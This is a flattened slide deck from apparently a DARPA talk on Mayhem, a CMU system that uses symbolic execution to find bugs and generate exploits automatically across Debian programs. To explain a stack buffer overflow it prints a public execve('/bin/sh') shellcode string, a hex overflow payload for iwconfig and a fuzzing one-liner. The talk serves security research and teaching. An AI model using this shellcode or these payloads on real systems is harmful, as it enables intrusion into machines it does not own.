Checking the World’s Software for Exploitable Bugs

Darpa Presentation

Checking the Worlds Software for Exploitable BugsDavid BrumleyCarnegie Mellon [email protected]://security.ece.cmu.edu/Stand up straight. PPW1Black

format c:White

vs.2An epic battleFirst sentence: I love computer security. I love that its an epic battle between white vs black, us vs them, good vs. evil. Its the only area of computer science that brings alive the notion of an adversary. In security, adversaries really exist. 2Black

format c:White

Bug

3Exploit bugs$ iwconfig accesspoint

$ iwconfig

#OK01ad 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 fce8 bfff 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 3101 50c0 2f68 732f 6868 622f 6e69 e389 5350 e189 d231 0bb0 80cdSuperuser

Exploit4Black

format c:White

Bug Fixed!5Fact: Ubuntu Linux has over 99,000 known bugs

6 inp=`perl e '{print "A"x8000}'` for program in /usr/bin/*; do for opt in {a..z} {A..Z}; do timeout s 9 1s $program -$opt $inp done done1009 Linux programs. 13 minutes. 52 new bugs in 29 programs.7Which bugs are exploitable?

Evil David8Plaid Parliament of PwningCMU Hacking Team9

10

DEF CON 2012 scoreboard11

CMUTime (3 days total)A Manual Process12DEF CON 201313

I skate to where the puck is going to be,not where it has been. --- Wayne Gretzky Hockey Hall of Fame14

White

Our Vision: Automatically Check the Worlds Software for Exploitable Bugs15

16We owned the machine in seconds

Evil David17Verification, but with a twistVerificationCorrectSafe pathsIncorrectExploitProgramCorrectness PropertyUn-exploitability Property1833,248 programs 152 new exploitable bugsOutlineBasic exploitationSymbolic execution for exploit generationAutomatic exploit generation on real codeExperimentsRelated projects and the future19Control flow hijack attacker gains control of execution

20buffer overflowformat string attackheap metadata overwriteuse-after-free...

Same principle,different mechanismProcess MemoryBasic execution semantics of compiled code21Code Data...StackHeapProcessorFetch, decode, executeread and writeEIP...Control Flow Hijack:EIP = Attacker CodeInstruction Pointer points to next instruction to executeStart with code in memory21int vulnerable(char *input){ char buf[32]; int x; if(...){ x = 1; } else { x = 0; } strcpy(buf,input); return x;}22Buffer overflows and the runtime stackControl flow hijack when input length > buffer lengthlocal variablesexecution semantics, including call/returnGo over program.2223...char *inputsaved eipcallers ebp32 bytes for bufint xchar *bufvulnerablesinitialstackframelower addressesint vulnerable(char *input){ char buf[32]; int x; ... strcpy(buf,input); return x;}locals allocated on stack24...char *inputsaved eipcallers ebp32 bytes for bufint xchar *buflower addressesint vulnerable(char *input){ char buf[32]; int x; ... strcpy(buf,input); return x;}writesWrites go up!ABC\0input = ABC\0...char *inputsaved eipcallers ebp32 bytes for bufint xchar *bufProcessorEIP25 caller(){ i: vulnerable(input);i+1: ...return addressreturn addressint vulnerable(char *input){ char buf[32]; int x; ... strcpy(buf,input); return x;}saved eiplower addressesABC\0...char *inputsaved eipcallers ebp32 bytes for bufint xchar *bufA buffer overflow occurs when data is written outside of the space allocated for the buffer.C does not check that writes are in-bound

26writesClassic Exploit:overwrite saved EIP* More advanced methods, like Return-Oriented Programming, can also be automatically generated in our researchTraditionally we show exploitability by running shellcodeThe key here is predetermined allocation.26Shellcode is a string27Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80Executable Stringexecve(/bin/sh, 0, 0);Compile...char *inputsaved eipcallers ebp32 bytes for bufint xchar *bufProcessorEIP\x31\xc9\xf7\xe1\x51\x68\x02\x02\x73\x68\x68\x2f...&buf28input = shellcode . address of bufint vulnerable(char *input){ char buf[32]; int x; ... strcpy(buf,input); return x;}&buf...char *inputsaved eipcallers ebp32 bytes for bufint xchar *bufProcessorEIP\x31\xc9\xf7\xe1\x51\x68\x02\x02\x73\x68\x68\x2f...29input = shellcode . address of buf%eip = execve(/bin/sh, NULL)&bufint vulnerable(char *input){ char buf[32]; int x; ... strcpy(buf,input); return x;}Owned!&bufAutomatically finding exploitable bugs30Verification, but with a twistVerificationCorrectSafe pathIncorrectExploitableProgramCorrectness PropertyUn-exploitability Property31We use symbolic execution to test paths[Boyer75, Howden75, King76]if x < 42if x*x = MAXINTx = input()32Basic symbolic executionif x > 42jmp stack[x]x can be anythingx > 42(x > 42) (x*x != MAXINT)(x > 42) (x*x != MAXINT) !(x < 42)ftftftSymbolic execution runs on symbolic input32if x < 42if x*x = MAXINTx = input()33if x > 42jmp stack[x]x can be anythingx > 42(x > 42) (x*x != MAXINT)(x > 42) (x*x != MAXINT) !(x < 42)ftftftPath formula(true for inputs that take path)Symbolic execution runs on symbolic input33if x < 42if x*x = MAXINTx = input()34Basic symbolic executionif x > 42jmp stack[x](x > 42) (x*x != MAXINT) !(x < 42)ftftftSatisfiabilityModulo Theory (SMT)SolverSatisfiable(x = 43)path test case!Symbolic execution runs on symbolic input34if x < 42if x*x = MAXINTx = input()35Basic symbolic executionif x > 42jmp stack[x]ftftft(x > 42) (x*x != MAXINT) (x 42if x*x = MAXINTjmp stack[x](x > 42) (x*x == MAXINT) Un-exploitableif x < 42Checking non-exploitabilityUn-exploitability property:EIP != user input37...char *inputsaved eipcallers ebp32 bytes for buf...Checking non-exploitabilityUNSAT(exploit) eip != user inputSMTSAT (safe)For each path38

Exploit generation can be cast as a verification problem.Real world exploit generationa brief history392005Automatic Discovery of API-Level Exploits[Ganapathy et al., Conference on Software Engineering]2008Automatic Patch-Based Exploit Generation[Brumley et al., IEEE Security and Privacy Symposium]2010Automatic Generation of Control Flow Hijack Exploits for Commodity Software [Heelan, MS Thesis]2011Automatic Exploit Generation[Avgerinos et al., Network and Distributed System Security Symposium]2011Q: Exploit Hardening Made Easy[Schwartz et al., USENIX Security Symposium]2012Unleashing Mayhem on Binary Code[Cha et al., IEEE Security and Privacy Symposium]And >150 papers on symbolic executionOursOthersExploiting Real Code:The Mayhem Architecture40Principles:Require only the binarye.g., BAP, our binary analysis platform

Use intelligent analysis to reduce state space e.g., preconditioned symbolic execution

Make queries to SMT as easy as possiblee.g., symbolic memoriesstrcpy(buf, input);while(input[i] != 0){ buf[i] = input[i]; i++;}buf[i] = 0;if (input[0] != 0) tfif (input[1] != 0) tfif (input[n] != 0) tf41Potentially infinite state spacecheck every branch blindlyif (input[0] != 0) tfif (input[1] != 0) tfif (input[n] != 0) tf20 minexploration30 minexplorationx minexplorationExploitablebug foundKLEE [Cadar08] does this4242All InputsTrigger bugControl HijackPreconditioned symbolic executionPreconditions focus search, e.g.:input > len43other examples in [Avgerinos11]input vs bugs doesnt typecheck44...char *inputsaved eipcallers ebp32 bytes for buf...

Static and online analysis determines likely exploit conditions40 bytesAll non-NULLchar buf[32];int x;...strcpy(buf, input);Example: length preconditionIf (input[0] != 0) tfIf (input[1] != 0) tfIf (input[n] != 0) tfNot explored.Saved 20 minNot explored.Saved 30minPrecondition Check:

length(input) > 40 input[1] == 0Not explored.Saved x minExploitablebug foundPrecondition Check:

length(input) > 40 input[0] == 0UnsatisfiableUnsatisfiable454546(x > 42) (x*x != 0xffffffff) !(x < 42)SMT SolverSAT. (x = 43)Dont treat as a black box!program the SMTSymbolic execution runs on symbolic input46Symbolic memory indices47x can be anythingWhich memory cell contains 42?232 cells to checkMemory0232 -1x := user_input();

y := mem[x];assert(y = 42);vulnerable();There are more causes

47Symbolic addresses occur oftenOther causesParsing: sscanf, vfprintf, etc.Character test: isspace, isalpha, etc.Conversion: toupper, tolower, mbtowc, etc.

48c = get_char();...to_lower(c);

to_lower(char c){ c >= -128 && c < 256 ? tbl[c] : c;}...abcd...tbl+AAddress is symbolic48Concretization: test case generation49x := user_input();

y := mem[30];assert(y = 42);vulnerable();1 cell to checkMemory0232 -130SolvableExploitsMisses over 40% of exploitse.g., SAGE, DART, CUTE, KLEEThere are more causes

49ObservationPath formula constrains rangeof symbolic memoryaccesses50y = mem[x]assert(y==42)ftx > 0x can be anything f t x < 5Use symbolic execution state to:Step 1: Bound memory addresses referencedStep 2: Reduce to linear formulas0 < x < 5IndexValue1012222051y = 2*x + 10y = - 2*x + 28piecewise linear equationsknow: 0 < x < 5y = mem[x]2022121041Ind.Value40% more exploits(strength reduction)See Paper for Details51Experiments with MayhemKnown exploitable bugs Coverage for 997 programsChecking Debian52532 Unknown Bugs:FreeRadius,GnuGol[Cha et al, NDSS12]WindowsLinuxcoverageCode coverage measures percentage of statements executed at least once by symbolic executor

Mayhem coverage measured on 997 programs compiled with gcov from /usr/bin and /bin

5450%Unchecked50% on average testedgcov coverage per program55ProgramsCoveragetotal unique lines (all programs): 2,245,632lines covered (all programs): 437,455absolute coverage: 19.48%56Unique code lines coveredAchieving 100% impossible due to dead code and other factors!Checking Debian5733,248 programs199,685,594 test cases2,365,154 crashes11,690 unique bugs152 new exploits2,727 days CPU time15,914,407,892 SMT queries28 cents a bug21 dollars an exploit.57public datahttp://forallsecure.com/summaries58mining dataQ: How long do queries take on average?A: 3.67ms on average with 0.34 variance

Q: Should I optimize hard or easy formulae?A: 99.99% take less than 1 secondand account for 78% of total time

Q: Do queries get harder?A: Good question...59optimize fast queries> basicStat()

Q. How many programs do you have?#program 957

Q. How many SMT formulae have you queried and solved (within timeout)? #query20223626

Q. Among those, how many are SAT? UNSAT? #sat #unsat2544620 17679006

Q. How many programs yield *fresh* formulae that take at least 1 second to solve?#program 563

Q. How many *distinct* SMT formulae take at least 1 second to solve?#formula 18663

Q. What are the basic statistics on the TIME it took to solve these formulae?bothtimesum sattimesum unsattimesum 387213.9 95185.1 292028.8bothtimemax sattimemax unsattimemax 277.2653 107.1409 277.2653bothtimeavg sattimeavg unsattimeavg 0.01914661 0.03740641 0.0165184bothtimevar sattimevar unsattimevar 0.06179814 0.07019839 0.06053416

Q. What are the basic statistics on the number of VARIABLES in these formulae?bothvarsmax satvarsmax unsatvarsmax 111 89 111bothvarsavg satvarsavg unsatvarsavg 15.12656 16.42357 14.93987bothvarsvar satvarsvar unsatvarsvar 35.7964 53.92014 32.91078

Q. What are the basic statistics on the number of CLAUSES in these formulae?bothclausesmax satclausesmax unsatclausesmax 275990 275990 275990bothclausesavg satclausesavg unsatclausesavg 968.1475 669.0946 1011.192bothclausesvar satclausesvar unsatclausesvar 6801531 11601246 6095962

Q. What are the basic statistics on the number of AST Nodes in these formulae?bothastnodesmax satastnodesmax unsatastnodesmax 3354063 3354063 3354060bothastnodesavg satastnodesavg unsatastnodesavg 15234.39 11408.75 15785.04bothastnodesvar satastnodesvar unsatastnodesvar 1044798320 1788943562 935280428

Q. What are the basic statistics on the DEPTH of exploration when generating these formulae?bothdepthmax satdepthmax unsatdepthmax 19557 3587 19557bothdepthavg satdepthavg unsatdepthavg 283.9193 189.2816 297.5409bothdepthvar satdepthvar unsatdepthvar 129693.1 73239.32 136344.15960

500 sec timeoutNo dominant upward trend in time to solve61

Size not strongly correlated with hardnessSATUNSAThardness is (likely) localized62Sym Exe. ThreadHardQueryDepth 0(Pointer Res.)Depth 1Depth 2

63Only 39 programs create hard formulasa/10 replaced with (a*0xcccccccd) >> 3We dont claim to find all exploitable bugsExploitability vs safe wrt to fixed input sizeBetter symbolic execution

But each report is actionable.We are not perfect64symbolic execution thrusts

1. Formalize Exploitcontrol flow hijack, information leaks, command injection

2. Binary ProgramVerificationpath merging, faster SMT653. Real CodeHandle messy details, transactional rollback

the larger pipeline66Program Analysissymbolicexecutionstatic analysisfuzzingTriageunpatched code clonesschedulingBAP [Brumley11] Decompiler [Schwartz13]Weighted coupon bug collecting with randomized MAB algs. 1.55x more bugs [Woo13]15,546 vulns[Jang12]Mayhem 11,690 bugs, 152 exploits [Cha11,Avgerinos12]2 year total: 27,659 bugs15,698 vulnsCheck OS Distribution

423 from fuzzing + 15,546 from redebug + 11690 from mayhem66were not even close to done67

Breaking the Satisfiability Barrier(NSF, with Tinelli and Barrett)ReGEACRefinement-Based Component Analysisfor Binary Code(DARPA, with Engler)And others:SMT Hardness (w/ Williams)Exploiting multi-core for behavior-based detection and repair (NSF, w/ Mutlu, Mowry) Vetting commodity systems (DARPA, w/ Gligor, Jaeger)....

High School Hacking CompetitionWhite

Our Vision: Automatically Check the Worlds Software for Exploitable Bugs68It seems wrong to not try.Thank You!Questions?69Credits

Postdocs:Manuel EgeleMaverick WooPhD Students:Thanassis AvgerinosTiffany BaoSang Kil ChaPeter ChapmanSamantha GottliebJiyong JangMatt MaurerAlex RebertEd SchwartzJonathan Burket

Undergrads:David KohlbrennerTyler NighswanderBrian PakCollaborators:Robert BrumleyJonathan DiamondBrent Ledvina

Special Thanks:Coherent NavigationMike CarnsPete KindBarbara McNamara

Funding:Core SecurityDARPAGoogleLockheed MartinNorthrop GrummanNSANSFSEIODNISymantecMicrosoftWileyPearsonAmazon AWS

69END